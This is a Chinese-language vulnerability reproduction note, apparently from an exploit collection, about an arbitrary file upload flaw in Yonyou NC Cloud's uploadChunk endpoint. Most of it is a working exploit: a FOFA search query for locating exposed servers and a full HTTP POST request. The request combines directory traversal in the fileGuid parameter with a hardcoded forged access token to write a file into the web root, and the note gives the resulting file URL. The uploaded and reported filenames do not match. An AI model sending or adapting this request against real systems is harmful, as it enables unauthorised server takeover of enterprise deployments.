用友NC cloud uploadChunk 存在任意文件上传
一、漏洞简介
NC Cloud是用友推出的大型企业数字化平台。 用友NC cloud uploadChunk 存在任意文件上传,攻击者可利用此漏洞获取服务器权限。
二、影响版本
- 用友NC Cloud
三、资产测绘
- fofa
app="用友-NC-Cloud" - 登录页面
四、漏洞复现
POST /ncchr/pm/fb/attachment/uploadChunk?fileGuid=/../../../nccloud/&chunk=1&chunks=1 HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36
Connection: close
Content-Length: 175
Content-Type: multipart/form-data; boundary=024ff46f71634a1c9bf8ec5820c26fa9
accessTokenNcc: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyaWQiOiIxIn0.F5qVK-ZZEgu3WjlzIANk2JXwF49K5cBruYMnIOxItOQ
Accept-Encoding: gzip, deflate
--024ff46f71634a1c9bf8ec5820c26fa9
Content-Disposition: form-data; name="file"; filename=".Ivoz0.txt"
2WtGfBFl2S4GP9FkbK2x5Mg3Dci
--024ff46f71634a1c9bf8ec5820c26fa9--
上传文件位置
http://xx.xx.xx.xx/nccloud/.UYskJ.txt